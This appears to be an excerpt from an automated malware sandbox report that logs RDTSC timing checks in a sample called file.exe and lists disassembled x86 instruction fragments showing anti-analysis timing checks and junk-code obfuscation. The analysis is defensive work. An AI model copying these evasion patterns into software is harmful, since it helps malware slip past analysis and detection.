Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53FA, second address: 13A53FE | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A587E, second address: 13A5895 | instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A5895, second address: 13A58E1 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F2A68BD69DEh 0x0000000c jmp 00007F2A68BD69DBh 0x00000011 popad 0x00000012 pushad 0x00000013 jnc 00007F2A68BD69ECh 0x00000019 jmp 00007F2A68BD69E6h 0x0000001e push ecx 0x0000001f je 00007F2A68BD69D6h 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A81DD, second address: 13A81E1 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8293, second address: 13A8297 | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8312, second address: 13A836B | instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e jno 00007F2A68BE4F47h 0x00000014 call 00007F2A68BE4F49h 0x00000019 ja 00007F2A68BE4F4Eh 0x0000001f push eax 0x00000020 jmp 00007F2A68BE4F4Fh 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A836B, second address: 13A8371 | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8371, second address: 13A8389 | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8389, second address: 13A838D | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A838D, second address: 13A843C | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jno 00007F2A68BE4F5Dh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F2A68BE4F57h 0x00000019 pop eax 0x0000001a mov ecx, ebx 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F2A68BE4F48h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov esi, dword ptr [ebp+122D3781h] 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D1D08h], esi 0x00000046 push 00000003h 0x00000048 jmp 00007F2A68BE4F57h 0x0000004d push 886E84CCh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jnp 00007F2A68BE4F46h 0x0000005b jmp 00007F2A68BE4F4Dh 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A843C second address: 13A8488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007F2A68BD69D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 37917B34h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F2A68BD69D8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f lea ebx, dword ptr [ebp+1246A06Ch] 0x00000035 jng 00007F2A68BD69DAh 0x0000003b push edi 0x0000003c pushad 0x0000003d popad 0x0000003e pop edi 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8488 second address: 13A848D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A848D second address: 13A8492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8492 second address: 13A8498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A84E1 second address: 13A84E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A84E7 second address: 13A85B7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BE4F4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F2A68BE4F48h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 call 00007F2A68BE4F52h 0x0000002e mov ecx, dword ptr [ebp+122D37DDh] 0x00000034 pop ecx 0x00000035 push 71160F76h 0x0000003a jnl 00007F2A68BE4F50h 0x00000040 xor dword ptr [esp], 71160FF6h 0x00000047 jng 00007F2A68BE4F4Bh 0x0000004d mov edi, 7AFD2A1Eh 0x00000052 pushad 0x00000053 or ecx, 7E1FC0B3h 0x00000059 movsx ecx, ax 0x0000005c popad 0x0000005d push 00000003h 0x0000005f mov dx, ax 0x00000062 push 00000000h 0x00000064 jmp 00007F2A68BE4F58h 0x00000069 push 00000003h 0x0000006b jmp 00007F2A68BE4F58h 0x00000070 call 00007F2A68BE4F49h 0x00000075 push eax 0x00000076 push edx 0x00000077 push ecx 0x00000078 jc 00007F2A68BE4F46h 0x0000007e pop ecx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A85B7 second address: 13A85CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69DFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9462 second address: 13C946D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C946D second address: 13C947F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2A68BD69D8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C947F second address: 13C9485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9485 second address: 13C9489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C75D5 second address: 13C75E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F4Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C78C3 second address: 13C78E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F2A68BD69E8h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7A44 second address: 13C7A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7A53 second address: 13C7A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69E7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7E3B second address: 13C7E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8224 second address: 13C823F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A68BD69D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2A68BD69DFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C823F second address: 13C8248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8248 second address: 13C8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F2A68BD69DEh 0x0000000e push eax 0x0000000f jmp 00007F2A68BD69E0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8271 second address: 13C827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D97E second address: 138D988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D988 second address: 138D98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85C0 second address: 13C85C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8BA3 second address: 13C8BC0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BE4F48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A68BE4F4Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8BC0 second address: 13C8BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8EA8 second address: 13C8EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jc 00007F2A68BE4F46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C92D5 second address: 13C92DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138BE7C second address: 138BE81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138BE81 second address: 138BEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 jmp 00007F2A68BD69E6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138BEAC second address: 138BEB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0712 second address: 13D0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A68BD69D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A68BD69E4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3006 second address: 13D3021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A68BE4F55h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3021 second address: 13D3040 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A68BD69DAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A68BD69DFh 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6ABF second address: 13D6AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2A68BE4F46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A68BE4F58h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6AE6 second address: 13D6AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6C46 second address: 13D6C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007F2A68BE4F4Eh 0x0000000d pushad 0x0000000e jne 00007F2A68BE4F46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6C64 second address: 13D6CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 je 00007F2A68BD69DCh 0x0000000f push edi 0x00000010 jmp 00007F2A68BD69E7h 0x00000015 jmp 00007F2A68BD69E9h 0x0000001a pop edi 0x0000001b pushad 0x0000001c jmp 00007F2A68BD69DFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7290 second address: 13D7299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7299 second address: 13D72B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2A68BD69DAh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jg 00007F2A68BD69D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8390 second address: 13D83BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F51h 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 43244B47h 0x00000012 or edi, dword ptr [ebp+122D35A1h] 0x00000018 push 63D63667h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D83BE second address: 13D83C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A68BD69D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D83C9 second address: 13D83CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8523 second address: 13D852E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2A68BD69D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D852E second address: 13D8533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D86F0 second address: 13D86F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D86F6 second address: 13D86FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D89D4 second address: 13D89E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8AD8 second address: 13D8AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A68BE4F4Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F2A68BE4F46h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8AF8 second address: 13D8B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9069 second address: 13D9071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D912C second address: 13D914F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov dword ptr [ebp+122D344Fh], esi 0x00000010 nop 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D914F second address: 13D9153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9153 second address: 13D9184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F2A68BD69E0h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9184 second address: 13D918A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D94B4 second address: 13D94B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D96DA second address: 13D96F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA59A second address: 13DA5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC1C1 second address: 13DC224 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F2A68BE4F48h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jmp 00007F2A68BE4F4Ch 0x0000002a push 00000000h 0x0000002c jmp 00007F2A68BE4F56h 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+122D3297h] 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ebx 0x0000003d jc 00007F2A68BE4F46h 0x00000043 pop ebx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DBF69 second address: 13DBF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DCCC9 second address: 13DCD26 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A68BE4F4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F2A68BE4F48h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 or esi, dword ptr [ebp+122D3731h] 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D3621h] 0x00000033 push 00000000h 0x00000035 jmp 00007F2A68BE4F54h 0x0000003a xchg eax, ebx 0x0000003b jc 00007F2A68BE4F50h 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD7F8 second address: 13DD7FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD582 second address: 13DD588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD7FE second address: 13DD83D instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A68BD69D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dword ptr [ebp+122D1D08h], edi 0x00000015 push 00000000h 0x00000017 cmc 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b sub esi, dword ptr [ebp+122D372Dh] 0x00000021 mov edx, 3A94850Bh 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2A68BD69E4h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE44C second address: 13DE451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2116 second address: 13E211C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4F87 second address: 13E4FA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F2A68BE4F4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF7DC second address: 13DF7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E40B4 second address: 13E40B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF7E0 second address: 13DF7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F30 second address: 13E5F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E40B9 second address: 13E40C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F3E second address: 13E5F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
